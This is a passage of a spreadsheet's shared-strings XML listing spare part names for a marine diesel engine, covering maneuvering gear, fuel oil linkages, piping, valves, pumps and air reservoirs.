    <t>LIMIT LEVER UNIT  FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>LIMIT LEVER  FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>STOPPER  FOR MANEUVERING HANDLE DEVICE</t>
  </si>
  <si>
    <t>POINTER  FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>LEVER  FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>SPINDLE  FOR MANEUVERING HANDLE DEVICE</t>
  </si>
  <si>
    <t xml:space="preserve">ROLLER LEVER TYPE LIMIT SWITCH </t>
  </si>
  <si>
    <t>GUIDE PIECE  FOR NAMEUVERING HANDLE DEVICE</t>
  </si>
  <si>
    <t>HANDLE BAR  FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>HANDLE  FOR F.O HANDLE</t>
  </si>
  <si>
    <t>STOPPER COLLAR  FOR FUELCONTROL KNOB</t>
  </si>
  <si>
    <t>WORM GEAR  FOR MANEUVRING HANDLE DEVICE</t>
  </si>
  <si>
    <t>POINTER  FOR MANEUVERING HANDLE DEVICE</t>
  </si>
  <si>
    <t>LEAF SPRING</t>
  </si>
  <si>
    <t>SCREW RIVET</t>
  </si>
  <si>
    <t>SUPPORT FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>NAME PLATE  FOR MANEUVERING HANDLE DEVICE</t>
  </si>
  <si>
    <t>LOCK PIN  FOR POSITION CHANGE HANDLE</t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE BEARING</t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE LEVER</t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE WASHER</t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE DAMPER</t>
  </si>
  <si>
    <t>SPRING BOX FOR FO CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SPRING  FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE LINK</t>
  </si>
  <si>
    <t xml:space="preserve">FO CONTROL LINKAGE SPACER (1) </t>
  </si>
  <si>
    <t xml:space="preserve">FO CONTROL LINKAGE SPACER (2) </t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE SHAFT</t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE LINK ROD</t>
  </si>
  <si>
    <t>LINK PIN</t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE PIN</t>
  </si>
  <si>
    <t>FO CONTROL LINKAGE NUT</t>
  </si>
  <si>
    <t>AIR CYLINDER  FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SNAP PIN</t>
  </si>
  <si>
    <t>DOUBLE RING</t>
  </si>
  <si>
    <t>FO PUMP CONTROL LINKAGE SHAFT</t>
  </si>
  <si>
    <t>FO PUMP CONTROL LINKAGE BEARING</t>
  </si>
  <si>
    <t>FO PUMP CONTROL LINKAGE LEVER</t>
  </si>
  <si>
    <t>FO PUMP CONTROL LINKAGE PIN</t>
  </si>
  <si>
    <t>FO PUMP CONTROL LINKAGE LINK JOINT</t>
  </si>
  <si>
    <t>BUSH  FOR FO. PUMP CONTROL LINKAGE</t>
  </si>
  <si>
    <t>WASHER FOR FO PUMP COTROL LINKAGE</t>
  </si>
  <si>
    <t>FO PUMP CONTROL LINKAGE SET PLATE</t>
  </si>
  <si>
    <t>PIN  FOR FO. RACK TRANSMITTER LINKAGE</t>
  </si>
  <si>
    <t>FO PUMP CONTROL LINKAGE BRACKET</t>
  </si>
  <si>
    <t>LINK  FOR FO. PUMP CONTROL LINKAGE</t>
  </si>
  <si>
    <t>CHANGE OVER VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>HANDLE BOX  FOR CHANGE OVER VALVE</t>
  </si>
  <si>
    <t>SLEEVE  FOR CHANGE OVER VALVE</t>
  </si>
  <si>
    <t>SPRING RETAINER  FOR CHANGE OVER VALVE</t>
  </si>
  <si>
    <t>HANDLE  FOR CHANGE OVER VALVE</t>
  </si>
  <si>
    <t>KNOB  FOR CHANGE OVER VALVE HANDLE</t>
  </si>
  <si>
    <t>PIN  FOR CHANGE OVER VALVE HANDLE</t>
  </si>
  <si>
    <t>SHAFT  FOR CHANGE OVER HANDLE</t>
  </si>
  <si>
    <t>PUSH ROD  FOR CHANGE OVER VALVE</t>
  </si>
  <si>
    <t>VALVE CAGE  FOR CHANGE OVER</t>
  </si>
  <si>
    <t>SPOOL VALVE  FOR CHANGE OVER VALVE</t>
  </si>
  <si>
    <t>NAME PLATE  FOR AH.AS HANDLE</t>
  </si>
  <si>
    <t>CUT OFF PLATE</t>
  </si>
  <si>
    <t>RETAINING RINGS (E TYPE)</t>
  </si>
  <si>
    <t>HEADLESS PLUGS</t>
  </si>
  <si>
    <t>HOUSING FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>BUSH  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>COVER  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>COVER  FOR STARTING AIR CONTROL VALVE CAGE</t>
  </si>
  <si>
    <t>CONTROL VALVE UNIT  FOR STARTING AIR</t>
  </si>
  <si>
    <t>CONTROL VALVE  FOR STARTING AIR</t>
  </si>
  <si>
    <t>PLUG  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>DOWEL PIN  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>SHAFT  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>FLANGE  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>DRAIN VALVE ASSEMBLY  FOR AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>BODY  FOR DRAIN VALVE</t>
  </si>
  <si>
    <t>UNION  FOR DRAIN VALVE</t>
  </si>
  <si>
    <t>SPRING  FOR CONTROL VALVE DRAIN VALVE</t>
  </si>
  <si>
    <t>PIN  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>BOLT FOR ELECTRIC WIRING</t>
  </si>
  <si>
    <t>CAM SHIFTING GEAR COVER</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR PISTON ROD</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR THRUST HOLDER</t>
  </si>
  <si>
    <t>POINTER FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>GAUGE FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR SERVO PISTON</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR THRUST PAD</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR VALVE STEM</t>
  </si>
  <si>
    <t>LIMIT SWITCH COVER</t>
  </si>
  <si>
    <t>SHUTTLE VALVE BODY</t>
  </si>
  <si>
    <t>SPRING FOR SAFETY STOPPER OF REVERSING SERVO MOTOR</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR COVER</t>
  </si>
  <si>
    <t>SHUTTLE VALVE  FOR CAMSHAFT STOPPER</t>
  </si>
  <si>
    <t>WASHER FOR CAMSHAFT SHIFTING GEAR OIL BOTTL AIR INLET</t>
  </si>
  <si>
    <t>FILTER  FOR CYLINDER AIR INLET</t>
  </si>
  <si>
    <t>FIXING PIECE  FOR CAMSHAFT SHIFTING GEAR LIMIT SWITCH</t>
  </si>
  <si>
    <t>BLIND COVER  FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>JOINT  FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR STOPPER</t>
  </si>
  <si>
    <t>NAME PLATE  FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>GASKET  FOR CAMSHAFT SHIFTING GEAR BODY</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR RETAINER</t>
  </si>
  <si>
    <t>TAPPING SCREW</t>
  </si>
  <si>
    <t>GUIDE PLATE  FOR CAM SHAFT SHIFTING STOPPER</t>
  </si>
  <si>
    <t>POINTER  FOR CAMSHAFT SHIFTING GEAR STOPPER</t>
  </si>
  <si>
    <t>INDICATOR PANEL FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>UPPER BEARING</t>
  </si>
  <si>
    <t>SPUR GEAR  FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>BEVEL GEAR  FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>BUSH  FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>JOINT  FOR GOVERNER DRIVING GEAR</t>
  </si>
  <si>
    <t>SHIM RING U</t>
  </si>
  <si>
    <t>KEY  FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>ELECTRIC TACHOMETER ASSEMBLY</t>
  </si>
  <si>
    <t>SUPPORT  FOR ELECTRIC TACHOMETER</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATOR DRIVING GEAR 
GEAR SHAFT</t>
  </si>
  <si>
    <t>CHAIN SPROCKET</t>
  </si>
  <si>
    <t>SNAP IDLER</t>
  </si>
  <si>
    <t>CYLINDER LO. DRIVING GEAR PARALLEL KEY</t>
  </si>
  <si>
    <t>PARALLEL KEY FOR CYLINDER LO. DRIVING GEAR</t>
  </si>
  <si>
    <t>STAND  FOR LUBRICATOR</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATING OIL STUD COMPLETE</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATING OIL STUD</t>
  </si>
  <si>
    <t xml:space="preserve">CYLINDER LO. STUD CHECKE VALVE </t>
  </si>
  <si>
    <t>CYLINDER LO. STUD SPRING RETAINER</t>
  </si>
  <si>
    <t>CYLINDER LO. STUD SPRING</t>
  </si>
  <si>
    <t>CYLINDER LO. STUD GASKET</t>
  </si>
  <si>
    <t>TURNING MOTOR</t>
  </si>
  <si>
    <t>SUPPORT FOR TURNING GEAR</t>
  </si>
  <si>
    <t>BRACKET  FOR TURNING GEAR</t>
  </si>
  <si>
    <t>3-WAY VALVE FOR TURNING GEAR</t>
  </si>
  <si>
    <t>WASHER FOR TURNING GEAR</t>
  </si>
  <si>
    <t>TURNING GEAR KEY</t>
  </si>
  <si>
    <t>ADJUST PLATE FOR TURNING GEAR</t>
  </si>
  <si>
    <t>LEVER  FOR TURNING GEAR</t>
  </si>
  <si>
    <t>SHAFT  FOR TURNING GEAR</t>
  </si>
  <si>
    <t>POSITIONING PLATE FOR TURNING GEAR</t>
  </si>
  <si>
    <t>PIN FOR TURNING GEAR</t>
  </si>
  <si>
    <t>KNOB FOR TURNING GEAR</t>
  </si>
  <si>
    <t>FITTING PLATE  FOR TURNING GEAR LIMIT SWITCH</t>
  </si>
  <si>
    <t>COVER  FOR TURNING GEAR LIMIT SWITCH</t>
  </si>
  <si>
    <t>BEARING  FOR TURNING GEAR</t>
  </si>
  <si>
    <t>CW. INLET PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>CW. INLET PIPE</t>
  </si>
  <si>
    <t>INLET PIECE  FOR CYLINDER CW.</t>
  </si>
  <si>
    <t>CYLINDER CW. OUTLET MAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>OUTLET CONNECTING PIPE FOR CYLINDER CW.</t>
  </si>
  <si>
    <t>ORIFICE  FOR CYLINDER JACKET CW. (OUTLET)</t>
  </si>
  <si>
    <t>GASKET  FOR CYLINDER JACKET CW. (OUTLET)</t>
  </si>
  <si>
    <t>C.W OUTLET PIPE BRACKET</t>
  </si>
  <si>
    <t>BRACKET FOR C.W OUTLET PIPE</t>
  </si>
  <si>
    <t>CYLINDER CW. WASTE PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>CYLINDER CW. WASTE PIPE</t>
  </si>
  <si>
    <t>U-BOLT  FOR FO. DRAIN PIPE ARRANGEMENT</t>
  </si>
  <si>
    <t>AIR COOLER COOLING WATER PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>INLET PIPE FOR AIR COOLER COOLING PIPE</t>
  </si>
  <si>
    <t>OUTLET PIPE FOR AIR COOLER COOLING WATER</t>
  </si>
  <si>
    <t>CONNECTING PIPE FOR AIR COOLER COOLING WATER</t>
  </si>
  <si>
    <t>BRACKET FOR AIR COOLER PIPE</t>
  </si>
  <si>
    <t>MAIN BEARING LO. PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>PIPE  FOR MAIN BEARING LO.</t>
  </si>
  <si>
    <t>MAIN BEARING INLET MAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>MAIN BEARING LO. BRANCH PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>BRANCH PIPE  FOR MAIN BEARING LO.</t>
  </si>
  <si>
    <t>T/C L.O. OUTLET PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>INLET PIPE(1) T/C LO</t>
  </si>
  <si>
    <t>ORIFICE  FOR T/C LUBRICATING OIL PIPE ARRANGEMENT</t>
  </si>
  <si>
    <t>A.V. DAMPER LO. ASSEMBLY</t>
  </si>
  <si>
    <t>LUBRICATING OIL STUD  FOR A.V. DAMPER</t>
  </si>
  <si>
    <t>INLET PIPE  FOR A.V. DAMPER LO.</t>
  </si>
  <si>
    <t>ORIFICE  FOR A.V. DAMPER</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATING OIL PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>ASSY. CYLINDER LUBRICATING OIL PIPE</t>
  </si>
  <si>
    <t>LUBRICATING OIL PIPE  FOR CYLINDER</t>
  </si>
  <si>
    <t>CYLINDER LUB OIL PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>CYLINDER LUB OIL PIPE</t>
  </si>
  <si>
    <t>FO. PUMP LO. PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>PIPE  FOR FO. PUMP LO.</t>
  </si>
  <si>
    <t>BALL VALVE FOR F.O.V COOLING WATER</t>
  </si>
  <si>
    <t>SUPPORT  FOR FO. PUMP LO. PIPE</t>
  </si>
  <si>
    <t>CAM SHAFT DRIVING GEAR LO. PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>LO. PIPE  FOR CAM SHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>LO. PIPE</t>
  </si>
  <si>
    <t>LO PIPE</t>
  </si>
  <si>
    <t>PIPE  FOR DRIVING GEAR LO.</t>
  </si>
  <si>
    <t>FUEL INJECTION PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>FO. PIPE SNUBBER ASSEMBLY</t>
  </si>
  <si>
    <t>BRACKET  FOR FUEL OIL PIPE</t>
  </si>
  <si>
    <t>FUEL OIL OUTLET MAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>MAIN PIPE  FOR FUEL OIL OUTLET</t>
  </si>
  <si>
    <t>BYPASS PIPE  FOR FUEL OIL PIPE</t>
  </si>
  <si>
    <t>FO. BRANCH PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>BRANCH PIPE (INLET)</t>
  </si>
  <si>
    <t>BRANCH PIPE (OUTLET)</t>
  </si>
  <si>
    <t>FUEL SHUT-OFF VALVE</t>
  </si>
  <si>
    <t>EYE BOLT                                FUEL INJECTION PUMP</t>
  </si>
  <si>
    <t>O RING                                  FUEL INJECTION PUNP JOINT</t>
  </si>
  <si>
    <t>NAME PLATE  FOR FO. CUT OFF HANDLE</t>
  </si>
  <si>
    <t>FO PIPE FOR FO OUTLET PIPE</t>
  </si>
  <si>
    <t>FUEL INJECTION PIPE ASSEMBLY            INTERNAL DIA4MM FOR DERATE SPEC.</t>
  </si>
  <si>
    <t>SLEEVE HOLDER  FOR FO. INJECTION PIPE (MAIN)</t>
  </si>
  <si>
    <t>SLEEVE HOLDER  FOR FO. INJECTION PIPE</t>
  </si>
  <si>
    <t>FUEL DISTRIBUTOR FOR FO.HIGH PRESSURE PIPE</t>
  </si>
  <si>
    <t>UNION  FOR FO INJECTION PIPE</t>
  </si>
  <si>
    <t>BRACKET  FOR FO. INJECTION PIPE</t>
  </si>
  <si>
    <t>STEAM TRACING PIPE ASSEMBLY (MAIN)</t>
  </si>
  <si>
    <t>STEAM TRACING MAIN PIPE</t>
  </si>
  <si>
    <t>BAND  FOR HOSE CLAMP</t>
  </si>
  <si>
    <t>STEAM TRACING PIPE ASSEMBLY (PUMP DRAIN)</t>
  </si>
  <si>
    <t>STEAM TRACING PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>STEAM TRACING PIPE</t>
  </si>
  <si>
    <t>STEAM TRACING PIPE ASSEMBLY (FO. VALVE DRAIN)</t>
  </si>
  <si>
    <t>MAIN PIPE  FOR STEAM TRACING PIPE (FO. VALVE DRAIN)</t>
  </si>
  <si>
    <t>STEAM TRACING PIPE ASSEMBLY (DRAIN PIPE)</t>
  </si>
  <si>
    <t>STARTING AIR MAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>DISCHARGE PIPE</t>
  </si>
  <si>
    <t>STARTING AIR PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>BRANCH PIPE  FOR STARTING AIR PIPE</t>
  </si>
  <si>
    <t>STARTING AIR CONNECTING PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>ASSEMBLY RELIEF VALVE</t>
  </si>
  <si>
    <t>VALVE U</t>
  </si>
  <si>
    <t>VALVE FOR SAFETY VALVE</t>
  </si>
  <si>
    <t>SPRING RETAINER FOR SAFETY VALVE</t>
  </si>
  <si>
    <t>THROTTLE VALVE FOR SAFETY VALVE</t>
  </si>
  <si>
    <t>CONNECTING PIPE  FOR STARTING AIR PIPE</t>
  </si>
  <si>
    <t>SPRING AIR PIPE ASSEMBLY (MAIN)</t>
  </si>
  <si>
    <t>MAIN PIPE  FOR SPRING AIR PIPE</t>
  </si>
  <si>
    <t>FLANGE  FOR SPRING AIR PIPE (MAIN)</t>
  </si>
  <si>
    <t>SPRING AIR PIPE ASSEMBLY (BRANCH)</t>
  </si>
  <si>
    <t>BRANCH PIPE  FOR SPRING AIR PIPE</t>
  </si>
  <si>
    <t>ASSY. STARTING AIR CONTROL PIPE(1)</t>
  </si>
  <si>
    <t>STARTING AIR CONTROL PIPE</t>
  </si>
  <si>
    <t>BRACKET  FOR STARTING AIR CONTROL PIPE</t>
  </si>
  <si>
    <t>ASSY. STARTING AIR CONTROL PIPE(2)</t>
  </si>
  <si>
    <t>WELDED UNIONS FOR STEEL PIPE</t>
  </si>
  <si>
    <t>NIPPLES FOR STEEL PIPE</t>
  </si>
  <si>
    <t>BAND  FOR STARTING AIR CONTROL PIPE</t>
  </si>
  <si>
    <t>BRACKET FOR ANTI VIBRATION OF STARTING CONTROL AIR PIPE</t>
  </si>
  <si>
    <t>STARTING AIR PIPE (CONNECTING)          ASSEMBLY</t>
  </si>
  <si>
    <t>MANEUVERING AIR DIAGRAM</t>
  </si>
  <si>
    <t>AIR OILER FOR METAL BALL</t>
  </si>
  <si>
    <t>3WAY VALVE  MANEUVERING SYSTEM</t>
  </si>
  <si>
    <t>FITTING PLATE</t>
  </si>
  <si>
    <t>FITTING PLATE FOR PRESSURE GAUGE CONNECTOR</t>
  </si>
  <si>
    <t>EX.V. DRIVING PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>EXH. V. DRIVING PIPE</t>
  </si>
  <si>
    <t>NIPPLE  FOR EXHAUST VALVE DRIVING PIPE</t>
  </si>
  <si>
    <t>COTTER</t>
  </si>
  <si>
    <t>OUTER PIPE  FOR EXHAUST VALVE DRIVING PIPE</t>
  </si>
  <si>
    <t>FLEXIBLE PIPE  FOR EXHAUST VALVE DRIVING PIPE</t>
  </si>
  <si>
    <t>JOINT RING  FOR EXHAUST VALVE DRIVING PIPE</t>
  </si>
  <si>
    <t>SPACER  FOR EXHAUST VALVE DRIVING PIPE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVE DRAIN PIPE</t>
  </si>
  <si>
    <t>BRACKET  FOR EXHAUST VALVE DRIVE PIPE</t>
  </si>
  <si>
    <t>INNER PIPE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVE OIL PIPE</t>
  </si>
  <si>
    <t>PIPE  FOR EXHAUST VALVE DRIVE OIL</t>
  </si>
  <si>
    <t>AIR SEPARATOR  FOR EXHAUST VALVE DRIVING OIL</t>
  </si>
  <si>
    <t>BRACKET  FOR EXHAUST VALVE DRIVE OIL PIPE</t>
  </si>
  <si>
    <t>SUTFFING BOX DRAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>3WAY BALL VALVE</t>
  </si>
  <si>
    <t>BRACKET U</t>
  </si>
  <si>
    <t>CRANK CASE MIST PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>CRANK CASE MIST PIPE</t>
  </si>
  <si>
    <t>FO. INJECTION PIPE DRAIN BRANCH PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>BRANCH PIPE  FOR FO. INJECTION PIPE DRAIN</t>
  </si>
  <si>
    <t>SUPPORT  FOR FO. DRAIN BRANCH PIPE</t>
  </si>
  <si>
    <t>FO. DRAIN PIPE (INJECTION PIPR)</t>
  </si>
  <si>
    <t>MAIN PIPE  FOR FO INJECTION PIPE DRAIN</t>
  </si>
  <si>
    <t>PIPE SUPPORT FOR FO.INJECTION PIPE DRAINMAIN PIPE</t>
  </si>
  <si>
    <t>FO. DRAIN PIPE ASSEMBLY (FO. PUMP)</t>
  </si>
  <si>
    <t>FO. DRAIN MAIN PIPE</t>
  </si>
  <si>
    <t>BRACKET  FOR FO. DRAIN PIPE (FO. PUMP)</t>
  </si>
  <si>
    <t>U BOLT  FOR FO. DRAIN PIPE (FO. PUMP)</t>
  </si>
  <si>
    <t>FUEL VALVE DRAIN BRANCH PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>BRANCH PIPE  FOR FO. VALVE DRAIN</t>
  </si>
  <si>
    <t>FUEL VALVE DRAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>PIPE  FOR FUEL VALVE DRAIN</t>
  </si>
  <si>
    <t>FO. DRAIN BRANCH PIPE ASSEMBLY (FO.PUMP)</t>
  </si>
  <si>
    <t>BRANCH PIPE  FOR FO. DRAIN (FO.PUMP)</t>
  </si>
  <si>
    <t>DRAIN PIPE WITH LEAK OIL ALARM ASSEMBLY</t>
  </si>
  <si>
    <t>JANCTION PIPE</t>
  </si>
  <si>
    <t>FLOAT SWITCH FOR LEAK OIL ALARM</t>
  </si>
  <si>
    <t>CRANK CASE.CAM CASE DRAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>CRANK CASE.CAM CASE DRAIN PIPE</t>
  </si>
  <si>
    <t>SCAVENGING AIR DRAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>SCAVENGING AIR DRAIN PIPE</t>
  </si>
  <si>
    <t>AUX. BLOWER DRAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>BRANCH PIPE  FOR DRIVE OIL DRAIN PIPE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVE OIL DRAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>MAIN PIPE  FOR EXHAUST VALVE DRIVE OIL DRAIN</t>
  </si>
  <si>
    <t>SPRING AIR DRAIN PIPE ARRANGEMENT</t>
  </si>
  <si>
    <t>CASE  FOR AIR THROTTLE</t>
  </si>
  <si>
    <t>BOTTLE  FOR SPRING AIR DRAIN</t>
  </si>
  <si>
    <t>BALL VALVE  FOR SPRING AIR DRAIN PIPE</t>
  </si>
  <si>
    <t>DRAIN SEPARATOR DRAIN PIPE ARRANGEMENT</t>
  </si>
  <si>
    <t>DRAIN PIPE FOR MOISTURE SEPARATOR</t>
  </si>
  <si>
    <t>BALL VALVE  FOR MOISTURE SEPARATOR DRAIN PIPE</t>
  </si>
  <si>
    <t>PIPE FITTING</t>
  </si>
  <si>
    <t>ORIFICE  FOR MOISTURE SEPARATOR DRAIN PIPE</t>
  </si>
  <si>
    <t>HORSE COUPLING  FOR MOISTURE SEPARATOR DRAIN PIPE</t>
  </si>
  <si>
    <t>BRACKET FOR MOISTURE SEPARATOR DRAIN PIPE</t>
  </si>
  <si>
    <t>AIR VENT AND DRAIN PIPE ARRANGEMENT FOR AIR COOLER</t>
  </si>
  <si>
    <t>TURBOCHARGER GAS SIDE DRAIN PIPE</t>
  </si>
  <si>
    <t>STAND  FOR GAUGE BOARD</t>
  </si>
  <si>
    <t>NAME PLATE FOR SEA WATER</t>
  </si>
  <si>
    <t>NAME PLATE FOR EXH. VALVE DRIVE. OIL</t>
  </si>
  <si>
    <t>BRACKET FOR TACHOMETER</t>
  </si>
  <si>
    <t>PRESSUER GAUGE PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>CONNECTING PLATE  FOR PRESSUE GAUE GAUGE PIPE</t>
  </si>
  <si>
    <t>DAMPENER FOR PRESSURE GAUGE OF F.O AND SCAVENGING AIR</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS(FEMALE STRAIGHT THREAD CONNECTOR)</t>
  </si>
  <si>
    <t>BUSHING FOR STARTING AIR SYSTEM</t>
  </si>
  <si>
    <t>TEST CIRCUIT FOR PRESSURE SWITCH</t>
  </si>
  <si>
    <t>SCREWED JOINT</t>
  </si>
  <si>
    <t>PRESSURE SWITCH BRACKET</t>
  </si>
  <si>
    <t>BRACKET  FOR JUNCTION BOX</t>
  </si>
  <si>
    <t>FITTING PIECE</t>
  </si>
  <si>
    <t>NAME PLATE LIST</t>
  </si>
  <si>
    <t>NAME PLATE  FOR JACKET CW. DRAIN VALVE</t>
  </si>
  <si>
    <t>CAUTION PLATE FOR AIR COOLER</t>
  </si>
  <si>
    <t>NAME PLATE  FOR STOP VALVE</t>
  </si>
  <si>
    <t>ARRANGEMENT OF ELECTRIC EQUIPMENT</t>
  </si>
  <si>
    <t>PROTECT PIPE FOR ELECTRIC WIRING</t>
  </si>
  <si>
    <t>GASKET  FOR OUTLET PIPE</t>
  </si>
  <si>
    <t>MECHANICAL SEAL                         COOLING EATER PUMP(TAIKO KIKAI)</t>
  </si>
  <si>
    <t>O RING                                  TAIKO WATER PUMP</t>
  </si>
  <si>
    <t>LO PUMP</t>
  </si>
  <si>
    <t>PUMP FOR STUFFING BOX LEAK OIL</t>
  </si>
  <si>
    <t>BALL BEARING                            NAMIWA PUMP TLG-2 PART NO.201</t>
  </si>
  <si>
    <t>BALL BEARING                            NAMIWA PUMP TLG-2 PART NO.202</t>
  </si>
  <si>
    <t>COUPLING SLEEVE                         NAMIWA PUMP TLG-2 PART NO.304</t>
  </si>
  <si>
    <t>OIL SEAL                                NAMIWA PUMP TLG-2 PART NO.531</t>
  </si>
  <si>
    <t>VALVE SPRING                            NAMIWA PUMP TLG-2 PART NO.707</t>
  </si>
  <si>
    <t>O RING                                  NAMIWA PUMP TLG-2 PART NO.050</t>
  </si>
  <si>
    <t>SPRING FOR SAFETY VALVE                 FOR NHG-1/2 PUMP (TAIKO)</t>
  </si>
  <si>
    <t>GLAND PACKING                           FOR NHG-1/2 PUMP(TAIKO)</t>
  </si>
  <si>
    <t>COUPLING BUSH                           TAIKO PUMP</t>
  </si>
  <si>
    <t>FO. STRAINER ASSEMBLY</t>
  </si>
  <si>
    <t>SPRING FOR LO.STRAINER KANAGAWA KIKI</t>
  </si>
  <si>
    <t>PACKING                                 FUEL OIL 2ND STRAINER KANAGAWA KIKI</t>
  </si>
  <si>
    <t>ELEMENT</t>
  </si>
  <si>
    <t>Y TYPE STRAINER  FOR EXHAUST VALVE DRIVE OIL PIPE</t>
  </si>
  <si>
    <t>ELEMENT FOR Y TYPE STRAINER</t>
  </si>
  <si>
    <t>SEA WATER STRAINER</t>
  </si>
  <si>
    <t>FRESH WATER COOLER</t>
  </si>
  <si>
    <t>TEMPERATURE CONTROL VALVE</t>
  </si>
  <si>
    <t>KINGSTON VALVE</t>
  </si>
  <si>
    <t>AIR RESERVOIR ASSEMBLY</t>
  </si>
  <si>
    <t>STARTING AIR RESERVOIR</t>
  </si>
  <si>
    <t>AIR RESERVOTR UNIT</t>
  </si>
  <si>
    <t>AIR RESERVOIR VALVE</t>
  </si>
  <si>
    <t>VALVE STEM PIECE</t>
  </si>
  <si>
    <t>DUST SEAL</t>
  </si>
  <si>
    <t>VALVE STEM GUIDE</t>
  </si>
  <si>
    <t>STOP VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>VALVE SEAT  FOR STOP VALVE</t>
  </si>
  <si>
    <t>VALVE STEM  FOR STOP VALVE</t>
  </si>
  <si>
    <t>DRAINAGE VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>RETURN VALVE</t>
  </si>
  <si>
    <t>SPRING  FOR RETURN VALVE</t>
  </si>
  <si>
    <t>THREE WAY JOINT</t>
  </si>
  <si>
    <t>3-WAY JOINT</t>
  </si>
  <si>
    <t>AIR RESERVOIR JOINT</t>
  </si>
  <si>
    <t>GLOBE VALVE</t>
  </si>
  <si>
    <t>AIR COMPRESSOR</t>
  </si>
  <si>
    <t>CHOCK LINER</t>
  </si>
  <si>
    <t>HOLDING DOWN BOLT ASSEMBLY</t>
  </si>
  <si>
    <t>HOLDING DOWN BOLT FOR REAMER</t>
  </si>
  <si>
    <t>BED PLATE SIDE JACK ASSEMBLY</t>
  </si>
  <si>
    <t>SIDE JACK FOR BED PLATE</t>
  </si>
  <si>
    <t>SIDE STOPPER  FOR BED PLATE</t>
  </si>
  <si>
    <t>ASSEMBLY OF VIBRATION PROOF STAY</t>
  </si>
  <si>
    <t>CONNECTING PLATE FOR VIBRATION ISOLATING STAY</t>
  </si>
  <si>
    <t>VIBRATION ISOLATING STAY FOR ENGINE SIDE</t>
  </si>
  <si>
